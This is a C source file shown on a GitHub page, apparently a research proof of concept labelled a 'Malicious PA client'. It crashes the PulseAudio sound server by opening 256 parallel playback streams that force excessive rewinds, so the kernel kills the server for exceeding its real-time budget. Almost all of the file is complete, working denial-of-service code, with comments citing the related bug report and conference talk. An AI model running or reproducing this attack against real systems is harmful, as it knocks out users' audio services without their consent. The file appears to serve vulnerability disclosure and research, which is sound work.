-
Notifications
You must be signed in to change notification settings - Fork 0
/
kill_server_quickly_open_write_streams.c
306 lines (255 loc) · 8.47 KB
/
kill_server_quickly_open_write_streams.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
/*
* Malicious PA client: Kill the server
*
* Copyright (C) 2016 Ahmed S. Darwish <darwish.07@gmail.com>
*
* SPDX-License-Identifier: GPL-2.0+
*
* Kill the server by quickly opening, and writing to, multiple connected
* streams in parallel. This will force excessive rewinds in the server,
* leading it to exceed its 200ms rtkit-allocated real-time budged, and
* thus getting killed by the kernel.
*
* For further details, check:
*
* - Timing issues in desktop audio playback infrastructure, Linux Audio
* Conference 2015, Alexander Patrakov
* http://lac.linuxaudio.org/2015/download/rewind-slides.pdf
*
* - PA Bugzilla: PulseAudio gets reliably killed upon a big number of
* client connections
* https://bugs.freedesktop.org/show_bug.cgi?id=94629
*
* - PA Access Control document
* https://www.freedesktop.org/wiki/Software/PulseAudio/Documentation/Developer/AccessControl/
*/
#include <assert.h>
#include <stdarg.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pulse/context.h>
#include <pulse/error.h>
#include <pulse/mainloop.h>
#include <pulse/mainloop-api.h>
#include <pulse/mainloop-signal.h>
#include <pulse/operation.h>
#include <pulse/proplist.h>
#include <pulse/sample.h>
#include <pulse/stream.h>
#include "common.h"
/*
* Context sent to all of our asynchronous callbacks
*/
struct context {
pa_mainloop_api *mainloop_api; /* Pulse abstract mainloop API vtable */
struct audio_file *file; /* Audio file buf, size, audio specs, etc. */
pa_context *context; /* PA Connection handle between client & server */
};
/*
* Gracefully stop PA event loop before exit
*/
static void quit(struct context *ctx, int ret) {
assert(ctx->mainloop_api);
assert(ret == EXIT_SUCCESS || ret == EXIT_FAILURE);
ctx->mainloop_api->quit(ctx->mainloop_api, ret);
exit(ret);
}
/*
* Stream state callbacks
*
* A 'stream' represents a data path between the client and server.
* Sample streams include a playback stream, a recording stream, or
* a file upload stream.
*
* A single client-server connection ('context') can have multiple
* streams. Each stream can have its own latency and time fragment
* requirements through PulseAudio buffer attributes. A stream can
* be moved to a different sink during its lifetime.
*/
static void stream_state_callback(pa_stream *stream, void *userdata) {
struct context *ctx = userdata;
assert(ctx);
assert(ctx->context);
switch (pa_stream_get_state(stream)) {
case PA_STREAM_CREATING:
case PA_STREAM_TERMINATED:
break;
case PA_STREAM_READY:
out("Playback stream succesfully created");
break;
case PA_STREAM_FAILED:
default:
error("Playback stream error: %s",
pa_strerror(pa_context_errno(ctx->context)));
goto fail;
}
return;
fail:
quit(ctx, EXIT_FAILURE);
}
/*
* Exit the application only after getting a confirmation that
* the playback stream has been _fully_ drained. Check
* below stream_write_callback() EOF handling for rationale.
*/
static void stream_drain_complete(pa_stream*s, int success, void *userdata) {
struct context *ctx = userdata;
out("Playback stream fully drained.. Exiting application");
quit(ctx, EXIT_SUCCESS);
}
/*
* Callback to be called whenever new data may be written to the
* playback data stream
*/
static void stream_write_callback(pa_stream *stream, size_t length, void *userdata) {
struct context *ctx = userdata;
struct audio_file *file;
struct pa_operation *operation;
size_t to_write, write_unit;
int ret;
assert(ctx);
assert(ctx->context);
assert((file = ctx->file));
assert(file->buf);
assert(file->readi <= file->size);
/* Writes must be in multiple of audio sample size * channel count */
write_unit = pa_frame_size(&file->spec);
to_write = file->size - file->readi;
to_write = min(length, to_write);
to_write -= (to_write % write_unit);
ret = pa_stream_write(stream, &file->buf[file->readi], to_write, NULL, 0,
PA_SEEK_RELATIVE);
if (ret < 0) {
error("Failed writing audio data to stream: %s",
pa_strerror(pa_context_errno(ctx->context)));
goto fail;
}
file->readi += to_write;
assert(file->readi <= file->size);
/*
* EOF! yay ..
*
* When reaching audio EOF, do not just close the application!
* Doing so leads to losing playback of the latest portion of
* the audio file (~ 0.5 seconds). Moreover, it produces ugly,
* quite loud, sound cracks :-(
*
* The playback stream needs to be drained first. Thus close
* the application, and the PA event loop, only after getting
* a confirmation that the stream drain is complete.
*/
if ((file->size - file->readi) < write_unit) {
out("Success! - Reached end of file");
out("Draining playback stream before exit");
/* Don't invoke our write callback again */
pa_stream_set_write_callback(stream, NULL, NULL);
operation = pa_stream_drain(stream, stream_drain_complete, ctx);
if (!operation) {
error("Could not drain playback stream: %s",
pa_strerror(pa_context_errno(ctx->context)));
goto fail;
}
}
return;
fail:
quit(ctx, EXIT_FAILURE);
}
/*
* Context state callbacks
*
* A 'context' represents the connection handle between a PulseAudio
* client and its server. It multiplexes everything in that connection
* including data streams , bi-directional commands, and events.
*/
static void context_state_callback(pa_context *context, void *userdata) {
struct context *ctx = userdata;
struct audio_file *file;
pa_stream *stream;
int ret;
assert(ctx);
assert((file = ctx->file));
switch (pa_context_get_state(context)) {
case PA_CONTEXT_AUTHORIZING:
case PA_CONTEXT_CONNECTING:
case PA_CONTEXT_SETTING_NAME:
break;
case PA_CONTEXT_READY:
out("Connection established with PulseAudio sound server");
for (int i = 0; i < 256; i++) {
stream = pa_stream_new(context, "playback stream", &file->spec, NULL);
if (!stream)
goto fail;
pa_stream_set_state_callback(stream, stream_state_callback, userdata);
pa_stream_set_write_callback(stream, stream_write_callback, userdata);
/* Connect this stream with a sink chosen by PulseAudio */
ret = pa_stream_connect_playback(stream, NULL, NULL, 0, NULL, NULL);
if (ret < 0) {
error("pa_stream_connect_playback() failed: %s",
pa_strerror(pa_context_errno(context)));
goto fail;
}
}
break;
case PA_CONTEXT_TERMINATED:
exit(EXIT_SUCCESS);
break;
case PA_CONTEXT_FAILED:
default:
error("PulseAudio context connection failure: %s",
pa_strerror(pa_context_errno(context)));
goto fail;
}
return;
fail:
quit(ctx, EXIT_FAILURE);
}
int main(int argc, char **argv) {
pa_proplist *proplist = NULL;
pa_mainloop *m = NULL;
pa_mainloop_api *api = NULL;
pa_context *context = NULL;
struct context *ctx;
struct audio_file *file;
int ret;
ctx = malloc(sizeof(struct context));
if (!ctx) {
errorp("Couldn't allocate async callbacks context");
goto quit;
}
memset(ctx, 0, sizeof(*ctx));
file = audio_file_new("samples/sample.wav");
if (!file)
goto quit;
proplist = pa_proplist_new();
if (!proplist) {
error("Couldn't create a PulseAudio property list");
goto quit;
}
pa_proplist_sets(proplist, PA_PROP_APPLICATION_NAME, "malicious-client-kill-server");
m = pa_mainloop_new();
if (!m) {
error("Couldn't create PulseAudio mainloop");
goto quit;
}
api = pa_mainloop_get_api(m);
context = pa_context_new_with_proplist(api, NULL, proplist);
if (!context) {
error("Couldn't create client context");
goto quit;
}
ctx->file = file;
ctx->mainloop_api = api;
ctx->context = context;
pa_context_set_state_callback(context, context_state_callback, ctx);
ret = pa_context_connect(context, NULL, 0, NULL);
if (ret < 0) {
error ("Couldn't connect to PulseAudio server: %s",
pa_strerror(pa_context_errno(context)));
goto quit;
}
pa_mainloop_run(m, &ret);
return ret;
quit:
exit(EXIT_FAILURE);
}